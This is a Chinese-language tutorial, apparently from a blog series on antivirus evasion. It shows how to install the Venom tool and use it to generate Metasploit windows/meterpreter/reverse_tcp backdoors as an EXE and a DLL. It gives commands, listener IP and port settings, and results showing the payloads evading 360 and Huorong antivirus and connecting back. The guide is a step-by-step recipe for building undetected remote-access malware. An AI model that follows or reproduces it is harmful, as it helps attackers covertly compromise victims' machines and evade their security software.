0x01 免殺能力一覽表

幾點說明：

1、上表中標識 √ 說明相應殺毒軟件未檢測出病毒，也就是代表了Bypass。

2、為了更好的對比效果，大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。

3、由于本機測試時只是安裝了360全家桶和火絨，所以默認情況下360和火絨殺毒情況指的是靜態+動態查殺。360殺毒版本5.0.0.8160(2019.12.12)，火絨版本5.0.33.13(2019.12.12)，360安全衛士12.0.0.2001(2019.12.17)。

4、其他殺軟的檢測指標是在virustotal.com（簡稱VT）上在線查殺，所以可能只是代表了靜態查殺能力，數據僅供參考，不足以作為免殺的精確判斷指標。

0x02 前言

Venom和Veil、Shellter是三大老牌免殺工具，免殺主要依靠分離執行和加密混淆等技術，可以和msf無縫對接。

Venom利用msfvenom（metasploit）生成不同的格式的shellcode，如（c | python | ruby | dll | msi | hta-psh）等，然后將生成的shellcode注入一個模板（例如：python），并使用類似gcc、mingw32或pyinstaller之類的編譯器生成可執行文件。

Venom的一些功能還會直接調用Veil-Evasion.py，unicorn.py，powersploit.py等來直接創建免殺程序，避免重復造輪子。

0x03 安裝venom

venom依賴的軟件比較多,所以安裝出現問題是很正常的。。請做好心里準備~

Zenity | Metasploit | GCC (compiler) | Pyinstaller (compiler) mingw32 (compiler) | pyherion.py (crypter) | wine (emulator) PEScrambler.exe (PE obfuscator) | apache2 (webserver)| winrar (wine) vbs-obfuscator (obfuscator) | avet (Daniel Sauder) | shellter (KyRecon) ettercap (MitM + DNS_Spoofing) | encrypt_PolarSSL (AES crypter)

1、從github上拖到本地

git clone https://github.com/r00t-3xp10it/venom.git

2、修改文件執行權限

cd venom sudo chmod -R +x *.sh sudo chmod -R +x *.py`

3、安裝依賴庫和軟件

cd aux sudo ./setup.sh

我在執行安裝中，遇到了幾個坑，其中遇到zenity報錯信息，翻遍了官方Github也沒找到解決辦法，報錯信息如下：

zenity: relocation error: /usr/lib/x86_64-linux-gnu/libxslt.so.1: symbol xmlBufContent version LIBXML2_2.9.0 not defined in file libxml2.so.2 with link time reference

將系統中/usr/local/lib/目錄下的libxml2.so.2從libxml2.so.2.7.8更換為libxml2.so.2.9.4

mv /usr/local/lib/libxml2.so.2.7.8 /usr/local/lib/libxml2.so.2.7.8_bak mv /usr/local/lib/libxml2.so.2 /usr/local/lib/libxml2.so.2_bak ln -s /usr/lib/x86_64-linux-gnu/libxml2.so.2.9.4 /usr/local/lib/libxml2.so.2

之后可正常安裝。
運行venom

sudo ./venom.sh

venom.sh文件在venom文件夾下

另外注意，在parrot系統中，root用戶無法直接使用systemctl start apache2.service開啟apache等服務，必須普通用戶才行。否則會提示

#systemctl restart apache2.service Failed to restart apache2.service: Access denied See system logs and 'systemctl status apache2.service' for details.

0x04 生成載荷

1、venom生成exe

到venom文件夾下，啟動venom:sudo ./venom.sh

然后選擇windows,也就是2

然后會列出所有windows可用的20個agent

支持的種類還是比較全面的，shellter、avet等免殺工具都內置在里面了，而且支持很多種類似的payload格式

我們先生成一個最簡單直接的，第4個模塊，通過C編譯EXE程序
在輸入4之后，會彈出一個框讓你輸入ip地址，這個就是你msf監聽主機的地址，我的就是10.211.55.2了，不要看著上面那個example還有子網掩碼什么的就照著輸。接著輸入監聽端口，我輸入的是5555

然后輸入端口號之后，選擇payload，我還是選擇最常規的windows/meterperter/reverse_tcp
再輸入一個文件名：

然后在編譯和生成exe的過程中，會彈出來兩個選項框，一般默認就行


如果沒有成功生成exe文件，看下提示，是不是沒有成功安裝mingw32，如果沒有裝，就安裝，安裝步驟：

1o - edit /etc/apt/sources.list 2o - comment (#) default repositories 3o - add the follow repositorie to your source.listdeb http://old.kali.org/kali sana main non-free contrib deb-src http://old.kali.org/kali sana main non-free contrib4o - save source.list file 5o - apt-get update 6o - apt-get install mingw32 (OR mingw64)

成功安裝顯示如下：

在換成原來的源：

7o - edit /etc/apt/sources.list 8o - remove follow lines from source.listdeb http://old.kali.org/kali sana main non-free contrib deb-src http://old.kali.org/kali sana main non-free contrib9o - un-comment the default repositories 10o - save source.list file 11o - apt-get update

按照原來生成exe的步驟再來一遍：

成功生成，文件在/home/venom/output文件夾下，也可以用find命令查

在測試機執行后，發現360安全衛士和360殺毒靜態檢測沒問題，但行為檢測都能查殺出為病毒

火絨則靜態+動態都沒有檢測到

2、venom生成dll

我們再試一下其他模塊的免殺效果，選擇windows之后，在agent中選擇第1個，生成dll。

面的操作和上面那個差不多，然后就能看到生成了dll_msf.dll文件，文件在/home/venom/output文件夾里，也可用find查

將文件拷貝到測試機上，命令行中執行rundll32.exe c_msf.dll,main，可動靜態免殺過360和火絨

msf正常上線

0x05 小結

venom是一個綜合性非常強大的工具，而且支持生成多平臺payload，比如android、ios、linux/unix、office等等，我這里也只是簡單演示了windows下的兩個agent，其他還有很多agent模塊免殺能力很強，比如18 shellter模塊等等。

在venom生成編譯的過程中可以看到他生成的shellcode其實是直接調用的msfvenom，而且在最后也可以和msf聯動進行監聽，還支持apache的web分發，很多模塊都能和msf無縫對接，雖然被殺軟盯的緊但免殺體驗還是不錯的。

0x06 參考資料

利用meterpreter下的Venom免殺后門:https://www.cnblogs.com/wh4am1/p/7469625.html

免殺后門venom :https://www.ggsec.cn/venom.html

總結

以上是生活随笔為你收集整理的远控免杀专题6---Venom免杀的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。